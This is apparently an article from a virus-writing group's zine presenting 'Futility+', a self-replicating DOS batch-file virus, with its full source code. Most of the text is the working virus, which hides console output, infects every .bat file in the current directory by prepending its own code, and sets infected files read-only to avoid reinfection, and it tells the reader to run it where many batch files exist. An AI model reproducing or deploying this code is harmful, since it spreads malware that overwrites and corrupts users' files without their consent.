Virus Labs & Distribution
VLAD AF - Futility
Futility+ by Quantum / VLAD
Below you will find a true batch virus that uses only one external exe.
It uses Attrib to set already infected batch files to read only so they
are not re-infected. Run the following batch file in a directory with
lots of .bat's and it will infect every one of them. It contains no
directory transversal methods.
@ctty nul
echo if [%%1]==[INFECT.BAT] goto fuckit > infect.bat
echo del something.tmp >> infect.bat
echo copy /b %%1 something.tmp >> infect.bat
echo del %%1 >> infect.bat
echo copy /b %0 + %0.bat + something.tmp %%1 >> infect.bat
echo del something.tmp >> infect.bat
echo attrib +r %%1 >> infect.bat
echo :fuckit >> infect.bat
for %%f in (*.bat) do call infect.bat %%f
del infect.bat
ctty con
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